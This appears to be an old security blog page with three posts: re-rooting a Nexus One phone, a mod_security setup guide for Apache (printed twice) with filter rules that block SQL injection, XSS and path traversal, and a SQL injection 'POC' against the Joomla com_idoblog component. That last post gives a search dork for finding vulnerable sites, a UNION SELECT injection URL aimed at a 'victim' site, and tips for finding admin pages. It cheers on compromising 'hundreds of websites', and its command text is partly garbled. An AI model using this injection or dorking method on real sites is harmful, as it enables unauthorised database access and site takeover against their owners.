04 May 2011
Root Nexus One Gingerbread MR2 2.3.4
Annoying system update notification on my nexus one rooted gingerbread 2.3.3.
Installed Gingerbread MR2 2.3.4 update and lost my root. Damn.
Flash this file su.zip using recovery-RA-passion-v2.2.1.img.
How to flash su.zip? go to http://chensun.net/android-development/root-nexus-one-with-android-2-3-3-gingerbread/8/
*for unlocked boot loader only
How to unlock Nexus One bootloader? go to : http://androidandme.com/2010/01/hacks/video-how-to-unlock-and-root-a-nexus-one/
Enjoy!
17 August 2009
Preventing Web Attack : Secure your Apache Web Server
Solution for Sql Injection , Blind Sqli, XSS attack, authentication bypass, brute force attack on admin page, etc.. = mod_security (Apache only)
Sorry ISS admin.
How to install mod_security in Apache(Unix) and Apache(Windows)
Download Mod Security here
Installing Mod Security on Linux/CentOS
Steps for mod_security 2.5, installation of older versions may differ.
1. wget http://www.modsecurity.org/download/modsecurity-apache_2.5.9.tar.gz
tar zxf modsecurity-apache_2.5.9.tar.gz
2. Compile with make
$make
3. Stop Apache
$/service/sbin httpd stop
4. install with make install
$make install
5. now go to your httpd.conf file, typically located at /etc/httpd/conf/
$vi /etc/httpd/conf/httpd.conf
6. find the section that contains the LoadModule portion.
Above all of the LoadModule directives add, paste the code
Code:
LoadFile /usr/lib/libxml2.so
7. Then go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf
8. now we need to get the configuration policies
$mkdir /etc/httpd/conf/modsecurity
cd /etc/httpd/conf/modsecurity
$wget http://www.modsecurity.org/download/modsecurity-core-rules_2.5-1.6.1.tar.gz
$tar zxf modsecurity-core-rules_2.5-1.6.1.tar.gz
$rm -f modsecurity-core-rules_2.1-1.4.tar.gz
9. Edit the *.conf files to fit your machines usage and expected rule sets
10. restart apache
if you have software package manager (yum tool)
yum install mod_security
Mod Security Configuration
Edit httpd.conf and add the following lines.
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Prevent path traversal (..) attacks
SecFilter "../"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|n)+>"
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
</IfModule>
Alternative:
Include conf/modsecurity/*.conf
*.com =mod security rules
Restart apache
Mod Security rules for Unix can be downloaded here:
http://www.gotroot.com/mod_security+rules
Install Mod Security on Windows Apache:
1. download mod_security2.so at http://www.apachelounge.com/ (a binary package)
2. unzip the package and you will get mod_security2.so and a libxml2.dll
4. create a folder /apache/modules/mod_security2 and copy mod_security2.so and libxml2.dll to this folder
5.create a folder /apache/conf/modsecurity and copy mod security rules (.conf files)
6. Install the Visual C++ 2008 Redistributable Package here
7.at hhtpd.conf go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2/mod_security2.so
8. At httpd.conf copy and paste modsecurity.conf-minimal:
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off
# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off
# Debug log
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 0
# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072
# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
9. You can using Include directive to include the mod_security configure file,
before activate the rules for your web server installation:
- edit and customize modsecurity_crs_10_config.conf.
- edit modsecurity_crs_40_generic_attacks.conf = detects common web application attack. Change the value "pass" to "deny,Status:500" in modsecurity_crs_40_generic_attacks.conf
Add the following line to your httpd.conf (assuming you've placed the rule files into conf/modsecurity/):
Include conf/modsecurity/*.conf
Mod Security requires mod_unique_id.
Uncomment mod_unique_id in httpd.conf
End. You web server is now pretty save,for now. 'pretty' he he
You can test mod security by installing Vulnerable Web Application for hacking simulation here:
Mutilidae
or
Damn Vulnerable Web Application
Sorry ISS admin.
How to install mod_security in Apache(Unix) and Apache(Windows)
Download Mod Security here
Installing Mod Security on Linux/CentOS
Steps for mod_security 2.5, installation of older versions may differ.
1. wget http://www.modsecurity.org/download/modsecurity-apache_2.5.9.tar.gz
tar zxf modsecurity-apache_2.5.9.tar.gz
2. Compile with make
$make
3. Stop Apache
$/service/sbin httpd stop
4. install with make install
$make install
5. now go to your httpd.conf file, typically located at /etc/httpd/conf/
$vi /etc/httpd/conf/httpd.conf
6. find the section that contains the LoadModule portion.
Above all of the LoadModule directives add, paste the code
Code:
LoadFile /usr/lib/libxml2.so
7. Then go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf
8. now we need to get the configuration policies
$mkdir /etc/httpd/conf/modsecurity
cd /etc/httpd/conf/modsecurity
$wget http://www.modsecurity.org/download/modsecurity-core-rules_2.5-1.6.1.tar.gz
$tar zxf modsecurity-core-rules_2.5-1.6.1.tar.gz
$rm -f modsecurity-core-rules_2.1-1.4.tar.gz
9. Edit the *.conf files to fit your machines usage and expected rule sets
10. restart apache
if you have software package manager (yum tool)
yum install mod_security
Mod Security Configuration
Edit httpd.conf and add the following lines.
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Prevent path traversal (..) attacks
SecFilter "../"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|n)+>"
# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
</IfModule>
Alternative:
Include conf/modsecurity/*.conf
*.com =mod security rules
Restart apache
Mod Security rules for Unix can be downloaded here:
http://www.gotroot.com/mod_security+rules
Install Mod Security on Windows Apache:
1. download mod_security2.so at http://www.apachelounge.com/ (a binary package)
2. unzip the package and you will get mod_security2.so and a libxml2.dll
4. create a folder /apache/modules/mod_security2 and copy mod_security2.so and libxml2.dll to this folder
5.create a folder /apache/conf/modsecurity and copy mod security rules (.conf files)
6. Install the Visual C++ 2008 Redistributable Package here
7.at hhtpd.conf go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2/mod_security2.so
8. At httpd.conf copy and paste modsecurity.conf-minimal:
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off
# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off
# Debug log
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 0
# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072
# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
9. You can using Include directive to include the mod_security configure file,
before activate the rules for your web server installation:
- edit and customize modsecurity_crs_10_config.conf.
- edit modsecurity_crs_40_generic_attacks.conf = detects common web application attack. Change the value "pass" to "deny,Status:500" in modsecurity_crs_40_generic_attacks.conf
Add the following line to your httpd.conf (assuming you've placed the rule files into conf/modsecurity/):
Include conf/modsecurity/*.conf
Mod Security requires mod_unique_id.
Uncomment mod_unique_id in httpd.conf
End. You web server is now pretty save,for now. 'pretty' he he
You can test mod security by installing Vulnerable Web Application for hacking simulation here:
Mutilidae
or
Damn Vulnerable Web Application
12 August 2009
Joomla com_idoblog SQL Injection Vulnerability (ALL VERSIONS)
dear mr admin,
Do you know that at least 5-10 Joomla component vulnerabilities is reported everyday. Everyday.
If you are using com_idoblog for your Joomla,please change to alternative,more secure component.
I've tested this vulnerability and yes,it affects all version of Joomla.
POC
1.google dork inurl:com_idoblog itemid=
2.inject ' at userid and you may receive an error message..here we go
3.use schemafuzzer/sqlmap instead of manual sql test. Manual sql thru browser will show only 3 column=false instead of 16=true.
4.schema fuzzer result =
$ python skemafuzzer.py -u "http://yourvictim.com/index.php?option=com_idoblog&task=profile&userid=63+AND+1=2+UNION+SELECT+darkc0de,
darkc0de,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15" < style="font-style: italic;">inurl:login.php or admin.php site:yourvictim.com
7.BOOOM!hundreds of websites waiting to be compromised
Subscribe to:
Posts (Atom)